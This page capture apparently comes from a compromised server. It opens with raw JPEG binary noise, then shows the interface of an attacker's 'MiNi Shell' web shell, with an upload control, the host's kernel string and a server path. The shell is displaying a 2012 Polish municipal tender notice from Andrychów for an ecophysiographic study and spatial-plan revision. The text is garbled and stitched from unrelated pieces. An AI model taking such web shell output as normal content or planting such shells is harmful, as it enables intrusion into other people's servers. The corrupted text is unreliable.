JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121025/418410-N-2012.html

<p class="kh_header"><b>Andrychów: Wykonanie opracowania ekofizjograficznego dla obszaru Gminy Andrychów oraz  zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Andrychów</b><br>
<b>Numer ogłoszenia: 418410 - 2012; data zamieszczenia: 25.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Andrychów reprezentowana przez Burmistrza , Rynek 15, 34-120 Andrychów, woj. małopolskie, tel. (0-33) 875-23-60, faks (0-33) 875-29-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.andrychow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie opracowania ekofizjograficznego dla obszaru Gminy Andrychów oraz  zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Andrychów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
a)  wykonanie  opracowania ekofizjograficznego dla obszaru Gminy Andrychów
b) opracowanie zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Andrychów 
Opracowania obejmują teren Gminy Andrychów o powierzchni 100,40 km 2
Szczegółowy opis przedmiotu  obejmuje:
 a) Opracowanie ekofizjograficzne  wykonane  zgodnie z obowiązującymi przepisami obowiązującymi w okresie realizacji umowy.
 b) Zmianę Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Andrychów  w oparciu o uchwałę Nr XXI-164-12 Rady Miejskiej w Andrychowie z dnia 29 marca 2012 r (załącznik nr 7 do SIWZ) na podstawie aktualnie obowiązujących aktów prawnych:
- ustawy z dnia 27 marca 2003r o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2012, poz. 647),
- rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004r w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U. z 2004r Nr 118, poz. 1233),


- ustawy z dnia 3 października 2008r o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2008r Nr 199, poz. 1227 z późniejszymi zmianami),
- innych obowiązujących przepisów prawa, dotyczących przedmiotu zamówienia.
Zamawiający oczekuje, że studium w sposób kompleksowy określi możliwości i kierunki rozwoju gminy w sposób pozwalający wszechstronnie wykorzystać jej potencjał ( w tym turystyczny - z wykorzystaniem możliwości inwestycji narciarskich w terenach górskich), przy jednoczesnym zapewnieniem jej walorów przyrodniczych i krajobrazowych                  z wykorzystaniem dostępnej u Zamawiającego Inwentaryzacji miejsc przyrodniczo cennych wraz ze wskazaniem  korytarzy ekologicznych terenów Gminy Andrychów
Opracowanie projektu studium winno być poprzedzone wykonaniem inwentaryzacji urbanistycznej oraz niezbędnych analiz, w tym analiz krajobrazowych.
Zamawiający wymaga, aby do projektu studium oraz prognozy oddziaływania na środowisko Wykonawca przedstawił wizualizację  dla rozwiązań przestrzennych w terenach górskich, wskazujące skutki krajobrazowe przyjętych w studium rozwiązań. 
Zamawiający ze swej strony przekaże wszelkie możliwe do udostępnienia materiały - będące w jego posiadaniu, a mogące mieć istotny wpływ na poziom i zakres przedmiotowego opracowania.

2. Materiały niezbędne do opracowania studium, w tym kopię mapy topograficznej Wykonawca pozyska we własnym zakresie.

3. Ponadto Wykonawca zobowiązany jest do:
a) przygotowania i przekazania Zamawiającemu materiałów, o których mowa w art. 11 ustawy o planowaniu i zagospodarowaniu przestrzennym,
b) przygotowania materiałów i udział: w posiedzeniu komisji urbanistyczno-architektonicznej, w dyskusji publicznej nad przyjętymi w projekcie studium rozwiązaniami oraz sporządzenie protokołu z tej dyskusji,
c) udziału w posiedzeniach Komisji Rady Miejskiej oraz sesji w trakcie uchwalania studium,
d) skompletowania dokumentacji prac planistycznych,
e) dokonania nieodpłatnie dodatkowych czynności jeżeli po podjęciu przez Radę Miejską uchwały w sprawie uchwalenia studium zaistnieją okoliczności uzasadniające konieczność
wykonania przez Wykonawcę dodatkowych prac co do przedmiotu zamówienia.

4. Wymagania w zakresie poszczególnych składników opracowania
a) Opracowanie ekofizjograficzne winno być sporządzone i dostarczone w 3 egzemplarzach ( część tekstowa + rysunki w skali 1: 10 000+ wersja elektroniczna)
b) Studium powinno być sporządzone i dostarczone w następującej formie:
1) na etapach roboczych:
- po 1 komplecie (tekst studium + rysunek studium + prognoza oddziaływania na środowisko - tekst + rysunek + wersja elektroniczna ze wszystkimi w/w opracowaniami) 
- komplet materiałów dla instytucji uzgadniających i opiniujących;
- komplet dla Rady Miejskiej na etapach uzgodnień z Radą Miejską (wersja elektroniczna - .jpg);
- komplet projektu studium na wyłożenie (tekst studium + rysunek studium w skali 1:5000 dla poszczególnych miejscowości + prognoza oddziaływania na środowisko);
2) na etapie końcowym:
- 4 komplety (tekst studium + rysunek studium w skali 1:10000+ inne załączniki graficzne do uchwały + wersja elektroniczna ze wszystkimi w/w opracowaniami) sporządzone w skali zgodnej z art.16 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003 r. Nr 80, poz. 717 ze zm.) w tym dwie plansze studium w skali 1:10 000 w formie zalaminowanej. Elektroniczna wersja winna być opracowana w oprogramowaniu EW-mapa w układzie 1965/1 i 2000/7 ( część graficzna) oraz Word ( część opisowa)
- 1 komplet (tekst studium + rysunek) dla Urzędu Wojewódzkiego;
- rysunek studium w skali 1:5000 dla każdej miejscowości..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości  2 900,00 zł            ( słownie: dwa tysiące dziewięćset złotych 00100) do dnia  15 .11.2012r  do godz. 10.30
2. Wadium może być wnoszone:
-przelewem - wpłacane na rachunek Zamawiającego w Banku Spółdzielczym                            w Andrychowie, nr rachunku 82 8110 0000 2001 0000 1225 0002 z dopiskiem wadium - Wykonanie opracowania ekofizjograficznego dla obszaru Gminy Andrychów oraz  zmiany Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Andrychów   tak, aby przed upływem terminu składania ofert wadium znajdowało się  na wyżej wymienionym rachunku.
-w poręczeniach bankowych, poręczeniach pieniężnych spółdzielczej kasy oszczędnościowo-kredytowej, gwarancjach  bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r.               Nr 42, poz. 275 z późn. zm.) - składane w oryginale w Urzędzie Miejskim w Andrychowie, ul. Rynek 16 Referat Księgowości Budżetowej  - pok. 120, I piętro,  za potwierdzeniem przyjęcia przed upływem terminu składania ofert lub załączone do oferty (tj. w kopercie z ofertą - w takim przypadku zamawiający przekaże oryginał dokumentu stanowiącego wadium do wyżej wymienionego Referatu Księgowości Budżetowej).
3. Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:
-być wystawione na Gminę Andrychów, Rynek 15, 34-120 Andrychów, zawierać w swojej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 4a i 5 Pzp,
-okres ważności wadium nie może być krótszy niż okres związania ofertą.

4. Zamawiający zwróci wadium w sposób odpowiadający formie wnoszenia w przypadkach wymienionych w art. 46 ust 1, 1a oraz 2 Pzp. W przypadku wpłaty przelewem Zamawiający zwróci kwotę wadium wraz z odsetkami wynikającymi z umowy prowadzenia rachunku, pomniejszoną  o koszty prowadzenia rachunku oraz o prowizje bankowe. Wadium wniesione inaczej niż  w pieniądzu Referat Księgowości Budżetowej Urzędu Miejskiego w Andrychowie wydaje lub przesyła wystawiającym za potwierdzeniem odbioru.

Zamawiający zatrzyma wadium w wypadku, gdy zajdzie jedna z okoliczności wymienionych w art. 46 ust. 4a lub 5 Pzp.
Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek  za  spełniony, jeżeli Wykonawca   złoży  oświadczenie o  spełnianiu warunków  na  formularzu wg wzoru jak w  załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże (na formularzu wg wzoru jak w załączniku nr 4 do SIWZ), że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 1  opracowanie studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy o powierzchni minimum 100 km2 o wartości powyżej 100.000,00 zł brutto oraz 1 opracowanie miejscowego planu zagospodarowania przestrzennego obejmujące obszary górskie ( o rzędnych przekraczających 700 m n.p.m.) Fakt wykonania takich usług musi być potwierdzony dokumentem, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże (na   formularzu  wg wzoru jak w załączniku nr 5 do SIWZ), że dysponuje co najmniej jedną osobą, która posiada uprawnienia urbanistyczne, osobą odpowiedzialną za realizację przedmiotu zamówienia, posiadającą kwalifikacje do pełnienia funkcji głównego projektanta planu oraz minimum trzyosobowym zespołem (z wyłączeniem głównego projektanta) wśród którego winni być specjaliści w dziedzinach: komunikacji, ochrony przyrody,  ochrony środowiska, ochrony zabytków. Główny projektant planu musi posiadać doświadczenie w wykonaniu (samodzielnie lub w zespole) co najmniej pięciu opracowań studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy lub miejscowych planów zagospodarowania przestrzennego w tym co najmniej jednego porównywalnego z opracowaniem stanowiącym przedmiot niniejszego zamówienia . Za opracowanie porównywalne uznaje się opracowanie uchwalonych studiów uwarunkowań i kierunków zagospodarowania przestrzennego lub miejscowych planów zagospodarowania przestrzennego obejmujące obszary górskie ( o rzędnych przekraczających 700 m n.p.m.) oraz obszary objęte co najmniej jedną spośród form ochrony przyrody: park krajobrazowy, obszar Natura 2000, obszar ochrony krajobrazu, obszar ochrony konserwatorskiej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże (na   formularzu  wg wzoru jak w załączniku nr 5 do SIWZ), że dysponuje co najmniej jedną osobą, która posiada uprawnienia urbanistyczne, osobą odpowiedzialną za realizację przedmiotu zamówienia, posiadającą kwalifikacje do pełnienia funkcji głównego projektanta planu oraz minimum trzyosobowym zespołem (z wyłączeniem głównego projektanta) wśród którego winni być specjaliści w dziedzinach: komunikacji, ochrony przyrody,  ochrony środowiska, ochrony zabytków. Główny projektant planu musi posiadać doświadczenie w wykonaniu (samodzielnie lub w zespole) co najmniej pięciu opracowań studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy lub miejscowych planów zagospodarowania przestrzennego w tym co najmniej jednego porównywalnego z opracowaniem stanowiącym przedmiot niniejszego zamówienia . Za opracowanie porównywalne uznaje się opracowanie uchwalonych studiów uwarunkowań i kierunków zagospodarowania przestrzennego lub miejscowych planów zagospodarowania przestrzennego obejmujące obszary górskie ( o rzędnych przekraczających 700 m n.p.m.) oraz obszary objęte co najmniej jedną spośród form ochrony przyrody: park krajobrazowy, obszar Natura 2000, obszar ochrony krajobrazu, obszar ochrony konserwatorskiej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek  za  spełniony, jeżeli Wykonawca   złoży  oświadczenie o  spełnianiu warunków  na  formularzu wg wzoru jak w  załączniku nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy wg wzoru na załączniku nr 1 do SIWZ.
2.	Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów.

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres wykonywania przedmiotu zamówienia.
Pisemne zobowiązanie podmiotu trzeciego należy załączyć do oferty w formie oryginału, zawierającego podpis podmiotu trzeciego pod treścią oświadczenia.

Dotyczy Wykonawców składających wspólna ofertę: 

W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokumenty, o których mowa w SIWZ dział VI pkt. A 1, 2, 3 oraz pkt. C 1, 2 składają wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia lub ich pełnomocnik.
Dokumenty, o których mowa w SIWZ dział VI  pkt. B 1, 2 składa we własnym imieniu każdy  z podmiotów wspólnie ubiegający się o udzielenie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) zmiana terminu wykonania przedmiotu umowy w razie gdy:
-  zmianie uległy przepisy prawne istotne dla realizacji przedmiotu umowy,
- z przyczyn niezależnych od Wykonawcy przedłużają się terminy procedur administracyjnych na etapie wydawania opinii, uzgodnień,
- nastąpiła niemożność rozpoczęcia realizacji umowy lub zaistniały przerwy w jej wykonaniu z przyczyn leżących po stronie Zamawiającego. Wówczas termin wykonania prac ulega przesunięciu o okres wynikający z przerw lub opóźnienia rozpoczęcia prac,
- działania osób trzecich uniemożliwiają wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron umowy,
b) zmiana wynagrodzenia brutto za przedmiot umowy w razie zmiany stawki podatku VAT
c) zmiana zakresu prac projektowych objętych umową w razie zmiany przez Zamawiającego założeń do projektu wprowadzonych w trakcie jego przygotowywania lub realizacji, wynikających z konieczności sporządzenia zamiennych lub uzupełniających opracowań projektowych,
d) zmiana osób upoważnionych do dokonywania czynności lub zmiana danych teleadresowych określonych w  umowie   w razie zaistnienia takiej potrzeby .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.andrychow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Andrychowie Rynek 15 34-120 Andrychów Wydział Gospodarki Przestrzennej i Nieruchomościami Referat Architektury i Budownictwa pok 115, w godz. pracy Urzędu Miejskiego lub za zal. poczt..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2012 godzina 10:30, miejsce: Urząd Miejski, Rynek 15, 34-120 Andrychów, sekretariat Burmistrza /II piętro/..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com